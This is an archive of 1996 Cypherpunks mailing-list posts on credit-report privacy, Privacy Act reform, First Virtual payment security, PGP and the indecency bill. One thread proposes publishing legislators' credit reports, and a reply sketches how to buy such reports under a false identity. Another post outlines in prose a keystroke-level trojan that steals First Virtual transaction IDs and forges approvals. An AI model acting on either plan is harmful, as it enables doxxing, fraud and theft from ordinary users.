      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 6 Feb 1996 03:02:08 +0800
To: Karl Ike <karl.ike@sihope.com>
Subject: violating politicians privacy
In-Reply-To: <199602050558.XAA17819@unix1.sihope.com>
Message-ID: <Pine.BSD.3.91.960205073610.8568I-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    attila sez:

	well, I take it as assumed correct that illegally violating the
    credit and personal information of member os Congress (might as well 
    include the Clintons and the Gores) would get a response on privacy.

	but you would be a targt of an incredible manhunt. For example,
    I can give you the name of an online information provider (if I was
    so disposed --which I am _not_, as I do not wish to be labelled as a 
    conspirator) who would provide the credit, medical, and background 
    reports of 500+ individuals for $20-25 a pop.  then you take out an 
    account on a system with a false id and does not require credit cards 
    (pay cash, not cheque)  --mail each one to the target rep/sen/bubba 
    after mailing the whole set to Geraldo, or some other slimball.

	but, I think I would put my money on further laws to really 
    clamp down on free speech. and, if you ever were caught, don't 
    expect all of us to donate one day a month for 10-50 years to visit
    you in the slammer.

	more laws, more political police, more prisons  --that's their 
    motto. 

	enjoy

_________________________________________________________________ attila__


On Sun, 4 Feb 1996, Karl Ike wrote:

> It is impossible to get changes in the Fair Credit Reporting Act in the
> traditional way. Credit reporting agencies have far too much personal
> information that is passed out with incrediable ease at the consumers expense. 
> 
> I have a suggestion! 
> 
> Today, with TRW, Equifax and TransUnion's vast network, it is easy to obtain
> anyone's credit report from various sources. Do you think if someone,
> outside of the USA, obtained the credit reports on half, maybe all, of the
> US Senators, congressmen, judges, etc, and published them in their entirity,
> on the internet, from outside the US, would get their attention? Then there
> would be changes, overnight, protecting the right of privacy! Let them
> become the victim of credit reporting agencies once and shit will happen
> overnight. 
> 
> If someone who is not a US citizen does this from outside the US, I don't
> think that they can be held accountable under US law? I am new to the
> internet and don't have a clue how to do it, but someone out there does and
> probably has a friend in Bankok that will help him. Put the word out! 
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Mon, 5 Feb 1996 21:41:33 +0800
To: cypherpunks@toad.com
Subject: Fair Credit Reporting Act and Privacy Act
Message-ID: <9602051325.AA08532@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW, while the goal of the cypherpunks in helping to promote secure
private communications by making encryption publicly available on a 
worldwide scale, definitely helps socially backward countries which 
have dictators (communist or otherwise), it misses its mark somewhat 
in the USA.  Personally, I think that in the USA, this is treating 
the symptom, but not the disease.

Probably the easiest way of ensuring that personal information isn't 
wantonly distributed by credit agencies or (anyone else) is to update 
our Privacy Act - which is ridiculously out-of-date and badly in need of
being re-written.  It is also hampered by its apparent lack of teeth.

My personal recommendation would be a law like Germany's BDSG. The BDSG
(BundesDatenSchutzGesetz which translates to: Federal Information/Data 
Protection Law (aka Privacy Act).  Even better would be a law like the 
one in Austria (which I understand has the world's strictest privacy act.  
(Hooray for the Austrians).  8^)

If the Privacy Act were rewritten to be as strict as the BDSG, businesses
would have a (mandatory) legal requirement to:

o Ensure that personal data is stored properly (by encrypting it, etc)
o Ensure that personal data is not distributed
o Ensure that databases are *not* being maintained which describe the
   characteristics of individuals (buying habits, income, property 
   ownership, etc) wantonly propagated by marketing (direct mail, 
   telemarketing, etc) companies.  

  (Note that credit bureaus still have a function, but they would be 
   (forced to be) responsible for ensuring that compliance with the 
   Privacy Act would be maintained.  This could result in better
   safeguards being implemented by the credit bureaus.)


resulting in the following by-products:

o the promotion of the use & implementation of encryption - including
   the possibility of ITAR being reduced or eliminated for the export
   of encryption products
o reduced propagation of personal information
o reduced amount of junk mail that winds its way to our mailboxes each day  8^)
o reduced amounts of tele-marketing  8^)


If pressure were brought to bear on the law-makers to rewrite the Privacy
Act to give it qualities like the BDSG, etc, then this would significantly
help achieve the cypherpunks' goal of promoting secure private communications.
(I realize this isn't the only goal of the c'punks, but its a start).  As the 
changes would be made within "the system" as opposed to outside of it, there
would be virtually no hassle from the government.

IOW, changing the Privacy Act will probably solve a variety of problems while
achieving the c'punks goal of secure personal communications.


Food for thought.

Best Regards,


Frank
<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 5 Feb 1996 22:44:58 +0800
To: rochberg+@CS.CMU.EDU
Subject: RE: Protecting the innocent on the nets
Message-ID: <960205092959.20213e8d@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


David rote:
>If so, then using the dictionary as the key seems bad---the
>compression dictionary is not designed to obscure the data, but to aid
>in compression.  The dictionary might well be easy to guess.  For
>example, some compression schemes use a Huffman coding on their
>dictionary.  If so, one can guess that short pointers into the
>dictionary correspond to common plaintext strings.  Using such a
>dictionary as an encryption system is security through obscurity.

Oh Heavens to Betsy, I was not trying to describe *crypto*, that might
be regulated. Was describing a mechanism to comply with the new Scudderite
laws concerning protecting the innocent from nasty sights.

Figure it this way: can duplicate CD-Roms for a quarter. If a subscription
costs $19.95/yr then who is going to bother with cloning it ? "controlled
circulation" magazines would save postage. Web pages could be posted with 
nothing but pointers (don't tell me you have never sat waiting for a
little red bar to reach the end) and assurance that only a specified audience
could look at the pretty pictures (which compress the best of all 8*).

Further, if the intent is to satisfy a law then would this not be a "good 
faith" attempt to do so ? Zippy's friends have decided what is not safe to be
on the net in the clear but they have not said what it takes to protect the
innocent while allowing consenting adults their freedom to communicate.

If I want good crypto I just use PGP (and the Enclyptor makes it real easy).
This is something completely different.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karl.ike@sihope.com (Karl Ike)
Date: Mon, 5 Feb 1996 23:47:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602051531.JAA07578@unix1.sihope.com>
MIME-Version: 1.0
Content-Type: text/plain


Attila: I'm not in the business of running or hiding. I'm just an average,
everyday working guy that doesn't like credit reporting agencies, what they
stand for or what they do for money. I didn't say that I was going to do
this. I just had the idea! I don't have the knowledge or the money to spend.
That doesn't mean that there is someone out there that would jump at the idea.

I just don't like the idea that these assholes know more about me than my
mother and sell my private and personal information to anyone for big bucks.
My credit is fine, just ask my banker or better yet, my mom.

I am assumming that you know far more people on the internet since I have
only been on for a month and have done three e-mail. I'm just suggesting to
get the idea out and someone will take the ball and run. Yes, they will be a
hunted man, but not a US citizen. Someone out there with a laptop and a
cellular, living on a cruise ship, just may enjoy the idea.

Just me, Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Tue, 6 Feb 1996 00:39:16 +0800
To: cypherpunks@toad.com
Subject: [local] Minneapolis CP get-together
Message-ID: <311629354a51002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Who: Minneapolis Cypherpunks
What: Local get-together & key signing party
When: Saturday, Feb 10th @ approx 5pm -> ???
Where: Applebees (3200 W Lake St)

I'll be facilitating a key signing, send your public key to me
before hand to get on the list. If you have any questions or need
directions, let me know.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Tue, 6 Feb 1996 00:39:51 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: A Sign of the Future
In-Reply-To: <199602050625.AAA00118@proust.suba.com>
Message-ID: <Pine.SOL.3.91.960205105408.18342B-100000@echonyc.com>
MIME-Version: 1.0
Content-Type: text/plain


Give me a break.  I do not work for Wired but I write for them at times, 
and most often my subject is crypto related. I can tell you for a fact 
that there is no anti-cypherpunk policy there. I have a long article that 
deals in part with cypherpunk-related cryptanlysis in the March issue and 
I was, as is always the case, left to make my own editorial judgement.

On Mon, 5 Feb 1996, Alex Strasheim wrote:

> >     Concerns about privacy and anonymity are outdated. Cypherpunks 
> >     think they are rebels with a cause, but they are really senti- 
> >     mentalists. 
> 
> I'm not much for big conspiracy theories, but I like the little ones.
> 
> If this was really in Wired, do you think it was written before or after 
> Tim dissed that magazine here?
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paralax@alpha.c2.org
Date: Tue, 6 Feb 1996 05:58:34 +0800
To: cypherpunks@toad.com
Subject: attila sez
Message-ID: <199602052019.MAA05730@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Date: Mon, 5 Feb 1996 06:49:57 +0000 (GMT)

a>    attila sez:

a>	It is not whether paralax does not know shit from beans, but that
a>    he proves to all that he would prefer to censor TCMay and James A.
a>    Donald than listen to their opinions, despite the fact he posted his
a>    own rather trivial and absurd point. 

a>    political correctness and the liberal news intrepretations of "all

I seek to censor no one.  I prefer to confront racisim whenever and wherever
I see (read) it.  Mr. May embarassed himself with his denigrating application
of the word "Jap" to describe the Japanese people after demonstrating a gross
lack of knowledge and sensitivity about Jews.  It is NOT a matter of "political
correctness" unless YOU and Mr. May believe refraining from addressing an
African-American as a nigger the moral equivalent of sucumbing to "politcal 
correctness".

a> with this, I suppose I have been entered upon your "list" of 
a> enemies of the 'statist' nation along with TCMay and James A. Donald,

All three of you would be flattering yourselves if any of you thought you made
anybody's list.

A. Paralax View




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wendy Fu" <WFU@sjulaw.stjohns.edu>
Date: Tue, 6 Feb 1996 04:49:57 +0800
To: cypherpunks@toad.com
Subject: fcpunx subscribe
Message-ID: <4C1F80260A3@sjulaw.stjohns.edu>
MIME-Version: 1.0
Content-Type: text/plain


Wendy Fu, Network Manager 
St. John's University School of Law
8000 Utopia Parkway, Jamaica, NY 11439
E-Mail Address: wfu@sjulaw.stjohns.edu
Phone: (718)990-1666




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wendy Fu" <WFU@sjulaw.stjohns.edu>
Date: Tue, 6 Feb 1996 03:12:14 +0800
To: cypherpunks@toad.com
Subject: fcpunx subscribe
Message-ID: <4C254DF0F18@sjulaw.stjohns.edu>
MIME-Version: 1.0
Content-Type: text/plain


endWendy Fu, Network Manager 
St. John's University School of Law
8000 Utopia Parkway, Jamaica, NY 11439
E-Mail Address: wfu@sjulaw.stjohns.edu
Phone: (718)990-1666




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 6 Feb 1996 06:22:28 +0800
To: nit@chron.com
Subject: Re: FV's blatant double standards
Message-ID: <2.2.32.19960205213944.0109c138@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:26 AM 2/4/96 -0500, Simson L. Garfinkel wrote:
>At 8:18 AM 1/31/96, Rishab Aiyer Ghosh wrote:
>>FV demonstrated, through it's "card sharp" or whatever, that
>>real-time transactions are vulnerable to sniffers on the recipient's
>>own machine. Of course. We all knew that. But the mistake is to
>>assume that FV isn't _equally_ vulnerable to that threat. If you
>>can write a trojan that will somehow get privileged access to my
>>machine, trap my keystrokes, and identify my credit card number,
>>you can certainly write one that will, sitting on my machine:
>>    "intercept the user's electronic mail, read the confirmation
>>    message from First Virtual's computers, and send out a fraudulent
>>    reply"
>>(to quote from Simson's article). Simson further quotes FV's Lee
>>Stein: "A single user can be targeted, Stein said, but ''it is very
>>difficult. . . . There are too many packets moving . . . to too many
>>different machines.''" - which is of course equally true for real-time
>>Netscape transactions.
>
>Oh, I think that such a program can be written. However, it would be much
>harder to get right, considering all of the different ways that people read
>e-mail.
>
>
The code looks something like this:

1) hook into the winsock and look for an FV message in the web data stream,
save the ID.

2) now look for an approve/deny/fraud, when you see one you know that the
user uses 
an IP connection for mail and web.

3) Forward the ID to an anon box.

4) Look for outbound FV messages with 'fraud' or 'deny' and change to 'approve'.

Clearly this will miss AOL, CI$ etc al but thats not important.

The issue is not FV noticing the error, they will, it's how long it takes
 and how much you can steal in the interim.

There is a Helen Keller quote I'm rather fond of which starts:
 "Security is mostly a superstition ..."

  *If the machine is not secure all bets are off*

The most likly failure vector for this attack is that so few people use FV :-)







John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 6 Feb 1996 05:55:35 +0800
To: Frank Willoughby <cypherpunks@toad.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <2.2.32.19960205200507.006fa0ac@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:25 AM 2/5/96 -0500, Frank Willoughby wrote:

>If the Privacy Act were rewritten to be as strict as the BDSG, businesses
>would have a (mandatory) legal requirement to:
>
>o Ensure that personal data is stored properly (by encrypting it, etc)
>o Ensure that personal data is not distributed
>o Ensure that databases are *not* being maintained which describe the
>   characteristics of individuals (buying habits, income, property 
>   ownership, etc) wantonly propagated by marketing (direct mail, 
>   telemarketing, etc) companies.  
>

Unfortunately, it would also:

*  Require government registration of computers and databases containing
information about people (whether these computers are used by business or
individuals).  This eases regulation of computers and future confiscation.

*  Reduce market efficiency by making it harder to match buyers and sellers
(because neither could easily find out about he other) thus causing higher
prices and poorer people. 

*  Do nothing to protect personal information from the government which
would get to collect more of it than ever in the course of enforcing data
protection laws.

If you don't want people to know things about you, don't tell them.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 6 Feb 1996 04:13:59 +0800
Subject: No Subject
Message-ID: <QQabqm02102.199602052007@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



<<"In other words it was stvation/devastation city">>

  It was lot worse than that on the Japanese-imperialits occupied islands 
of the Pacific when the Nisei troops choosenot to surrender and instead, 
mad last-ditch charges against AMerican lines - which killed not a small 
number of Americans. And of course, there were the suicide bombers.

Submarine operations don't cost zero lives, either. In fact, just plain 
old regular military logistics - keeping the boys mobilized and in place 
ina theatre of operations - don't cost zero lives, even if there are _no_ 
hostilities.

And while all the starvation and devastation was going on in Japanese
cities, the Japanese troops were torturing and murdering Allied POWs, and
Asian civilains in all the Japanese-occupied teritories. Those people
deserved liberation, too. 

I think you give your game away when you complain about how we were being 
unfair to Comrade Stalin.

As far as Pax Americana goes, the Japanese just _volunteered_ to_increase_
the payments they make to support the American garrison in Japan. The
non-Okinawans want us in their country. I guess they know that the
alternative is a Red Chinese garrison. 

And lots of other Asians are afraid of the same alternative - or of 
Japanese garrisons in their homeland. THey've "been there, done that".

Alan Horowitz 
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 6 Feb 1996 04:21:40 +0800
Subject: No Subject
Message-ID: <QQabqm03268.199602052012@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Feb 1996 Pot@networking.stanford.edu wrote:

> This is not FLAMEpunks.
> 
	WHAT???   --and miss all the fun?


__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 6 Feb 1996 05:54:26 +0800
To: avatar@mindspring.com
Subject: Re: Encryption Programs
In-Reply-To: <199602041551.KAA26343@borg.mindspring.com>
Message-ID: <9602052013.AA18934@oliver.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> OBVIOUSLY the spokesman of the group. I ask for help and this is what I get?
> 
>         One more time, I'm well aware of the capabilities of PGP. What I'm
> looking for is a program
> that does a better job of binary encryption than just Radix 64 ASCII armoring.

Umm, I think you might be a little confused.  Either that, or you
mis-typed.  What do you mean by "better job of binary encryption than
just Radix 64 ASCII armoring"?  PGP does a lot more than just Ascii
Armor.  The Ascii Armor is just a self-recognizing transport
mechanism, nothing more.

The real meat behind PGP is its encryption and key management
utilities.  PGP uses the IDEA cipher, combined with RSA key
management, to securely encrypt any kind of file.  The Ascii Armor is
used solely to protect the PGP files during transport over email and
other ascii-only protocols.

I hope this clears up any possible misconceptions.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 6 Feb 1996 09:39:05 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: Encryption and Backups
In-Reply-To: <2.2.32.19960205043354.00703aa4@mail.software.net>
Message-ID: <311621cd.3804730@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 04 Feb 1996 20:33:54 -0800, you wrote:

> CP Backup (part of PC Tools for Central Point aka Symantec) has DES. As to
> how good the implementation is: I have no idea.

CP backup does not work reasonably under Win95, certainly not under
NT, and Symantec has announced that they are NOT upgrading it, or
Fastback, or Norton backup, all of which they own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 6 Feb 1996 04:55:36 +0800
Subject: No Subject
Message-ID: <QQabqo07307.199602052033@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>> INFORMATION IS INSECURE THE MOMENT YOU TOUCH A KEY.
>
>> This does not mean that Internet commerce is dead.  Any scheme that is
>> not based on self-identifying one-way financial instruments such as
>> credit cards will be essentially unaffected by this problem.  Moreover,
>> even credit cards may be made safe on the Internet using one of two
>> approaches:  secure hardware add-ons and the First Virtual approach.

etc.

My name for this kind of software:

  Terminate and Stay Clueless


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Tue, 6 Feb 1996 08:28:46 +0800
To: cypherpunks@toad.com
Subject: RC2 source code post to sci.crypt
Message-ID: <9602052347.AA18642@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain



So, who cancelled the post anyway?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 6 Feb 1996 05:32:37 +0800
Subject: No Subject
Message-ID: <QQabqr19026.199602052128@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Although this particular request was sent to the cypherpunks mailing
list, others continue to send requests to my mailbox.

>>>>> "Wendy" == "Wendy Fu" <WFU@sjulaw.stjohns.edu> writes:

Wendy> endWendy Fu, Network Manager 
Wendy> St. John's University School of Law
Wendy> 8000 Utopia Parkway, Jamaica, NY 11439
Wendy> E-Mail Address: wfu@sjulaw.stjohns.edu
Wendy> Phone: (718)990-1666

I don't know how my address got associated with this list, but please,
*do not* send requests about FCPUNX to steve@miranova.com.

Requests about how to set up Gnus scoring for performing your own
filtering of the cypherpunks list are welcome.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 6 Feb 1996 06:57:53 +0800
To: cypherpunks@toad.com
Subject: TWP on Indecency Protest
Message-ID: <199602052229.RAA14765@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, February 5, 1996, p. A8.


   Language on 'Indecency' Sparks Telecommunications Bill
   Protest

   By John Schwartz


   Provisions in the overhaul of the nation's
   telecommunications laws that call for regulating adult
   materials on the Internet have sparked a storm of anger and
   protest on that medium.

   "This is the kind of legislation you'd see from a lot of
   senators and congressmen who have never logged on," said
   Michael Godwin, staff counsel for the Electronic Frontier
   Foundation, a civil liberties group. "The Christian Right
   thinks they've hit a home run here, but the inning isn't
   over."

   The provisions, proposed by Sen. J. James Exon (D-Neb.),
   have gained momentum with support from religious
   conservative organizations. The legislation would make it
   illegal to make "indecent" material available to minors via
   computer, with penalties of two years in prison and up to
   $250,000 in fines. Exon called passage last week "a victory
   for children and families," adding, "We've come to a
   successful closing of the 'peep show' doors to our youth."
   President Clinton has said he will sign the bill.

   Those opposed to the regulations, however, said the
   "indecency" standard, which has been used in broadcast
   regulation cases, is too vague and would seriously restrict
   the potential of the emerging on-line medium.

   "I am concerned this legislation places restrictions on the
   Internet that will come back to haunt us," said Sen.
   Patrick J. Leahy (D-Vt.). He warned that quoting from such
   works as "Catcher in the Rye" and "Ulysses" in on-line
   discussions could court prosecution and said that making it
   illegal to "make available" indecent language would outlaw
   posting of messages or images that a child might see.
   "Imagine if the Whitney Museum ... were dragged into court
   for permitting representations of Michelangelo's David to
   be looked at by kids."

   But John McMickle, an aide to Sen. Charles E. Grassley
   (R-Iowa), said drafters rejected the idea that Userious
   works of redeeming value" would fall within the law, which
   he said would apply only to "patently offensive" material.
   McMickle said the bill "is not a Comstock-type effort to
   wipe out literature or political speech."

   The American Civil Liberties Union, the Electronic Frontier
   Foundation and other organizations are preparing a lawsuit
   challenging the indecency provisions on constitutional
   grounds. Other legal actions are in the works. An on-line
   publication, American Reporter, has announced it will soon
   publish a column by a Texas judge denouncing the
   legislation intentionally salted with "indecent" language;
   Randall Boe, a Washington attorney for the American
   Reporter, said he would immediately sue after publication.

   "We want to move promptly to have this statute set aside as
   unconstitutional," Boe said. "The longer it's in place, the
   greater the harm done to the Internet and to the First
   Amendment." Boe's firm, Arent, Fox, Kintner, Plotkin &
   Kahn, was defense council in the landmark "seven dirty
   words" case, which set the legal standard for indecent
   language in broadcasting based on a monologue by comedian
   George Carlin.

   Cathleen Cleaver, director of legal studies for the Family
   Research Council, said yesterday she expected such suits
   and that her conservative organization, which has pushed
   for on-line regulation, would fight to uphold it.

   The Justice Department has stated that the legislation
   would be vulnerable to attack on constitutional grounds.
   But in response to a letter from Grassley, Assistant
   Attorney General Andrew Fois noted last week that the
   department is defending the indecency standard in
   legislation "and will continue to defend similar statutes
   against constitutional challenges, so long as we can assert
   a reasonable defense consistent with the Supreme Court
   rulings in this area."

   -----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an359557@anon.penet.fi
Date: Tue, 6 Feb 1996 03:13:03 +0800
To: cypherpunks@toad.com
Subject: Re: C2 and the Worst Case
Message-ID: <9602051739.AA09360@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



>Are you saying that when someone with an anonymous mailbox on c2.org
>retrieves his/her mail via a POP3 connection, no log is made of
>the originating IP address?

It's even worse than that. The IP address/hostname that connects to c2 shows
up when you finger that user on c2!

Sameer, can you please change that? An anonymous user don't wanna leave a
trail as obvious as an IP address.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Tue, 6 Feb 1996 07:22:25 +0800
To: cypherpunks@toad.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <9602052254.AA15929@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


Verily at 03:05 PM 2/5/96 -0500, Duncan Frissell did write:

>At 08:25 AM 2/5/96 -0500, Frank Willoughby wrote:
>
>>If the Privacy Act were rewritten to be as strict as the BDSG, businesses
>>would have a (mandatory) legal requirement to:
>>
>>o Ensure that personal data is stored properly (by encrypting it, etc)
>>o Ensure that personal data is not distributed
>>o Ensure that databases are *not* being maintained which describe the
>>   characteristics of individuals (buying habits, income, property 
>>   ownership, etc) wantonly propagated by marketing (direct mail, 
>>   telemarketing, etc) companies.  
>>
>
>Unfortunately, it would also:
>
>*  Require government registration of computers and databases containing
>information about people (whether these computers are used by business or
>individuals).  This eases regulation of computers and future confiscation.

Works great in theory, not in practice.  Having worked in Germany for 9 
years, I can *guarantee* that the German gov't hasn't implemented the 
above.  It may have been a good idea (in their eyes, not mine), but it 
isn't implementable in a democratic society - it bogs down in the 
implementation phase).  

Are you planning on registering every computer system that each person and 
company has with the gov't?  Most sysadmins I know are up to their ears in
work and are barely able (if at all) to recognize which users they have on 
their system, and why they have accounts at all (business justification).  
This might also get pretty wild when the ISPs get polled in terms of usage.  
(Compuserve notwithstanding).  

Gathering the registration data will be a bear to implement - keeping it 
current will be impossible (for the forseeable future).  Besides, this
would cast further shadows of "big brother" and remind former "ossies"
in the former GDR/DDR  & eastern block of days gone by - which they would 
probably rather not remember.

Also, just because Germany tries this approach (and fails), doesn't mean 
we have to repeat their mistake in this area.


>
>*  Reduce market efficiency by making it harder to match buyers and sellers
>(because neither could easily find out about he other) thus causing higher
>prices and poorer people. 

Actually, it would probably increase market efficiency as they would be 
spending their marketing budget on other appropriate methods which have 
a higher success-ratio.  I don't know what the success rates are of 
mass-mailings, or tele-marketing, but I doubt if they approach 1% (wild 
guess).  Seriously - what is your first impulse when you reach the phone
and find out the caller is a tele-marketer?  The annoyance factor is 
rather high for these.  More than likely, this was also the reason that
unsolicited mass-faxing of marketing info was forbidden by law a while 
ago?

FWIW, personally, I think many marketing organizations have gone off the 
deep end in their efforts to try to be effective (to wit: putting logos
on clothing, in video games, etc; sponsor's logos in Home Pages, 3-5 minutes
of TV commercials every 6-10 minutes of TV (for those rare moments one gets 
to watch TV (thank heavens for cable TV & CNN)).  8^)


>
>*  Do nothing to protect personal information from the government which
>would get to collect more of it than ever in the course of enforcing data
>protection laws.
>

You're assuming this isn't happening now?  IMO, that would be a rather naive
assumption.  Personally, I think that the law should also consider exactly 
this point.  The gov't should have no more access to personal information 
than it needs to carry on its job - and we as taxpayers should decide how 
much access they need to have.


>If you don't want people to know things about you, don't tell them.

Agreed....But, this essentially means giving up your phone, your credit 
cards, your house, your car, your job, and generally withdrawing from
society.  Not a particularly viable plan, IMO.  The main problem is 
that the companies do little to nothing about protecting an individual's
private data.  It isn't any of my business how much money, you make, 
the amount your home is worth, your credit rating, info about your 
family (wife, kids, etc), religion, etc - yet, all of these are within
the easy access of many individuals who don't have a "need-to-know" of 
this information.  If I don't have a "need-to-know" about this info, I
shouldn't be able to access it.

>
>DCF

Of course since we are re-writing the Privacy Act from scratch, we can
leave out the items you mentioned & design it the way it should be.

Best Regards,


Frank





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 6 Feb 1996 10:48:32 +0800
To: "Simson L. Garfinkel" <simsong@vineyard.net
Subject: Re: FV's blatant double standards
Message-ID: <2.2.32.19960206020035.00e2bea8@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:39 PM 2/5/96 -0500, Simson L. Garfinkel wrote:
>Yes, clearly if you are not concerned about missing 50-75% of First Virtual's 
>users, this attack will work just fine.
>-simson
>
>
Who cares - if 25 to 50% of a systems users are
vulnderable doesn't that make it weak ?

John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 6 Feb 1996 07:56:28 +0800
To: cypherpunks@toad.com
Subject: IEEE Security Symposium Program
Message-ID: <9602052328.AA02380@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 5 Feb 1996 14:14:22 -0800
To: pem-dev@tis.com, ietf-pkix@tandem.com, ipsec-owner@ans.net
>From: Stephen Kent <kent@bbn.com>
Subject: IEEE Symposium Program Announcement

I'm distributing a copy of this year's program to members of these
security-oriented WG mailing lists as a means of "getting the word out" to
individuals who may be interested in attending this sort of conference.  As
the chair of the former PEM WG, and current co-chair of the PKI WG, I feel
that this announcement is appropriate for these lists, and I hope my fellow
IPSEC WG members agree that it is appropriate for that list as well.  I
apologize in advance for those of you who, like me, will receive multiple
copies of this announcement.

Steve
===========================================================================



1996 IEEE SYMPOSIUM ON SECURITY AND PRIVACY                    _/_/
                                                            _/    _/
                                                           _/           _/
May 6-8, 1996                                                _/_/    _/_/_/
The Claremont Resort,                                           _/    _/
Oakland, California                                       _/   _/
                                                           _/_/
Sponsored by the                                                  _/_/_/
IEEE Technical Committee on Security and Privacy                 _/   _/
In cooperation with the                                         _/   _/
International Association of Cryptologic Research              _/_/_/
                                                              _/
Symposium Committee                                          _/
Dale M. Johnson, General Chair                                    _/_/_/  _/_/
Stephen Kent, Vice Chair                                        _/   _/ _/
John McHugh, Program Co-Chair                                  _/   _/ _/
George W. Dinolt, Program Co-Chair                             _/_/_/ _/_/_/
                                                                  _/ _/   _/
                        PRELIMINARY PROGRAM                      _/ _/   _/
                         Subject to Change                      _/   _/_/

MONDAY, MAY 6

08:30-09:00  WELCOMING REMARKS:  Dale Johnson and John McHugh

09:00-10:30  PANEL:  Object Management Group CORBA Security Standard
                Moderator:  Terry Benzel
                Participants:  TBA

10:30-11:00  BREAK

